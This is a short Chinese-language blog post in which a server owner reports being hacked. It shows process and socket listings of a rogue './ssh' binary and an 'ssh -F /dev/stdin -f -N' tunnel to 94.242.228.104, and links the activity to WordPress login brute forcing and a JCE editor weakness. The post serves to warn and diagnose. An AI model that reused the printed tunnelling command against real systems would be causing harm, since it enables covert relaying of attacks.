被駭了，小心 ssh -F /dev/stdin -f -N 94.242.228.104

相關資訊

# ps axu|grep apache

root 20299 0.0 0.0 61180 744 pts/3 S+ 10:17 0:00 grep apache
apache 24067 0.0 0.0 2172 580 ? Ssl 09:14 0:00 ./ssh
apache 24213 0.0 0.0 56240 956 ? Ss 09:14 0:00 ssh -F /dev/stdin -f -N 94.242.228.104

# ps axu|grep ssh

root 4084 0.0 0.0 62680 648 ? Ss 2012 3:09 /usr/sbin/sshd
apache 24067 0.0 0.0 2172 580 ? Ssl 09:14 0:00 ./ssh
apache 24213 0.0 0.0 56240 956 ? Ss 09:14 0:00 ssh -F /dev/stdin -f -N 94.242.228.104

# ps axjf

1 24067 24067 24067 ? -1 Ssl 502 0:00 ./ssh
1 24213 24213 24213 ? -1 Ss 502 0:00 ssh -F /dev/stdin -f -N 94.242.228.104

# lsof -i :22

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 4084 root 3u IPv4 13212 0t0 TCP *:ssh (LISTEN)
ssh 24213 apache 3u IPv4 3368838914 0t0 TCP xxxxx:56916->by.evoluso.com:ssh (ESTABLISHED)

找到這個

wp-login.php Brute Force not only PHP scripts, but now also via SSH tunnel from 94,242,228,104

作者發現它是一直在對某些 IP 作 POST wordpress 的連結

且是因為 wordpress 的 JCE editor 弱點駭入的，特別是 wordpress 3.0.5

被駭了，小心 ssh -F /dev/stdin -f -N 94.242.228.104

wp-login.php Brute Force not only PHP scripts, but now also via SSH tunnel from 94,242,228,104

Related posts 相關文章

掃描 SSH 歷屆漏洞

xz liblzma 漏洞後門事件

我現在的筆記方式

apache httpd 2.4.58 有些安全性更新

作者

留言

撰寫回覆或留言取消回覆

被駭了，小心 ssh -F /dev/stdin -f -N 94.242.228.104

wp-login.php Brute Force not only PHP scripts, but now also via SSH tunnel from 94,242,228,104

Related posts 相關文章

掃描 SSH 歷屆漏洞

xz liblzma 漏洞後門事件

我現在的筆記方式

apache httpd 2.4.58 有些安全性更新

作者

留言

撰寫回覆或留言 取消回覆

撰寫回覆或留言取消回覆